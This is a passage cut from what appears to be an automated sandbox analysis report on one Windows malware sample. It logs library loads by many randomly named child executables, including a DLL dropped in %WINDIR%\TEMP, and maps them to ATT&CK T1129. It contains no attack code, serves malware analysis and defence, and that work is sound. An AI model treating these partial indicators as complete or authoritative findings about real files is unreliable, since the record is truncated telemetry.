\"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"rbppd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"rbppd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rbppd.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"rbppd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rbppd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"rbppd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"6824004.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"6824004.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6824004.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"6824004.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6824004.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"dnhpbvd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"dnhpbvd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dnhpbvd.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"dnhpbvd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dnhpbvd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"fxlrjhd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"fxlrjhd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fxlrjhd.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"fxlrjhd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fxlrjhd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"fxlrjhd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"fxxdb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"fxxdb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fxxdb.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"fxxdb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fxxdb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"482088.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"482088.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"482088.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"482088.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"482088.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"lpnpn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"lpnpn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lpnpn.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"lpnpn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lpnpn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"dnjtl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"dnjtl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dnjtl.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"dnjtl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dnjtl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"lvdfpxj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"lvdfpxj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lvdfpxj.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"lvdfpxj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jnbhhn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"jnbhhn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jnbhhn.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"jnbhhn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jnbhhn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"hnndln.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"hnndln.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hnndln.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"hnndln.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8064284.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"8064284.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8064284.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"8064284.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8064284.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"02684.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"02684.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"02684.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"02684.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"02684.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"0888688.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"0888688.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0888688.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"0888688.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0888688.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"0002220.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"0002220.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0002220.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"0002220.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0002220.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"604424.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"604424.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"604424.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"604424.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"604424.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"pdhnj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"rhnxdp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"rhnxdp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rhnxdp.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"rhnxdp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhnxdp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"rhxhth.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"rhxhth.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rhxhth.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"rhxhth.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rhxhth.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"66446.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"66446.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"66446.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"66446.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"66446.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"4824668.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"4824668.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4824668.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"4824668.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4824668.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"njhpfx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"njhpfx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"njhpfx.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"njhpfx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"njhpfx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000\n \"bjdlj.exe\" loaded module \"MSVCRT.DLL\" at base 75b20000\n \"bjdlj.exe\" loaded module \"SHLWAPI.DLL\" at base 77830000\n \"bjdlj.exe\" loaded module \"USER32.DLL\" at base 758a0000\n \"bjdlj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 753f0000\n \"xrfjx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71bd0000\n \"xrfjx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xrfjx.exe\" loaded module \"KERNEL32\" at base 762b0000\n \"xrfjx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xrfjx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a500000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005800)\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005800)\n \"tfxnptb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005984)\n \"tfxnptb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005984)\n \"628008.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005764)\n \"628008.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005764)\n \"628008.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005764)\n \"628008.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005764)\n \"nxhlxrp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005776)\n \"nxhlxrp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005776)\n \"nxhlxrp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005776)\n \"nxhlxrp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005776)\n \"jbdtnd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005756)\n \"jbdtnd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005756)\n \"jbdtnd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005756)\n \"jbdtnd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005756)\n \"rbffv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005780)\n \"rbffv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005780)\n \"rbffv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005780)\n \"rbffv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005780)\n \"jfdjvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006124)\n \"jfdjvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006124)\n \"jfdjvd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006124)\n \"jfdjvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006124)\n \"nrhhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006120)\n \"nrhhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006120)\n \"nrhhv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006120)\n \"nrhhv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006120)\n \"tbbdbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006000)\n \"tbbdbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006000)\n \"tbbdbn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006000)\n \"tbbdbn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006000)\n \"vjdhtlv.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003732)\n \"vjdhtlv.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003732)\n \"vjdhtlv.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003732)\n \"ffpfpp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006020)\n \"ffpfpp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006020)\n \"ffpfpp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006020)\n \"ffpfpp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006020)\n \"00688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003708)\n \"00688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003708)\n \"00688.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003708)\n \"00688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003708)\n \"8644820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000772)\n \"8644820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000772)\n \"8644820.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000772)\n \"8644820.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000772)\n \"ldnfnvr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001904)\n \"ldnfnvr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001904)\n \"ldnfnvr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001904)\n \"ldnfnvr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001904)\n \"jnnjf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001896)\n \"jnnjf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001896)\n \"jnnjf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001896)\n \"jnnjf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001896)\n \"rbppd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003840)\n \"rbppd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003840)\n \"rbppd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003840)\n \"rbppd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003840)\n \"6824004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001908)\n \"6824004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001908)\n \"6824004.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001908)\n \"6824004.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001908)\n \"dnhpbvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002256)\n \"dnhpbvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002256)\n \"dnhpbvd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002256)\n \"dnhpbvd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002256)\n \"fxlrjhd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002076)\n \"fxlrjhd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002076)\n \"fxlrjhd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002076)\n \"fxlrjhd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002076)\n \"fxxdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002768)\n \"fxxdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002768)\n \"fxxdb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002768)\n \"fxxdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002768)\n \"482088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003256)\n \"482088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003256)\n \"482088.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003256)\n \"482088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003256)\n \"lpnpn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002888)\n \"lpnpn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002888)\n \"lpnpn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002888)\n \"lpnpn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002888)\n \"dnjtl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003972)\n \"dnjtl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003972)\n \"dnjtl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003972)\n \"dnjtl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003972)\n \"lvdfpxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004432)\n \"lvdfpxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004432)\n \"lvdfpxj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004432)\n \"lvdfpxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004432)\n \"jnbhhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001740)\n \"jnbhhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001740)\n \"jnbhhn.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001740)\n \"jnbhhn.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001740)\n \"hnndln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001708)\n \"hnndln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001708)\n \"hnndln.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001708)\n \"hnndln.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001708)\n \"8064284.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001744)\n \"8064284.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001744)\n \"8064284.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001744)\n \"8064284.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001744)\n \"02684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003200)\n \"02684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003200)\n \"02684.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003200)\n \"02684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003200)\n \"0888688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000484)\n \"0888688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000484)\n \"0888688.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000484)\n \"0888688.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000484)\n \"0002220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001544)\n \"0002220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001544)\n \"0002220.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001544)\n \"0002220.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001544)\n \"604424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003544)\n \"604424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003544)\n \"604424.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003544)\n \"604424.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003544)\n \"rhnxdp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002144)\n \"rhnxdp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002144)\n \"rhnxdp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002144)\n \"rhnxdp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002144)\n \"rhxhth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001176)\n \"rhxhth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001176)\n \"rhxhth.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001176)\n \"rhxhth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001176)\n \"66446.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003556)\n \"66446.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003556)\n \"66446.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003556)\n \"66446.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003556)\n \"4824668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001112)\n \"4824668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001112)\n \"4824668.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001112)\n \"4824668.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001112)\n \"njhpfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004188)\n \"njhpfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004188)\n \"njhpfx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004188)\n \"njhpfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004188)\n \"bjdlj.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003832)\n \"bjdlj.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003832)\n \"bjdlj.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003832)\n \"xrfjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004468)\n \"xrfjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004468)\n \"xrfjx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004468)\n \"xrfjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004468)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n 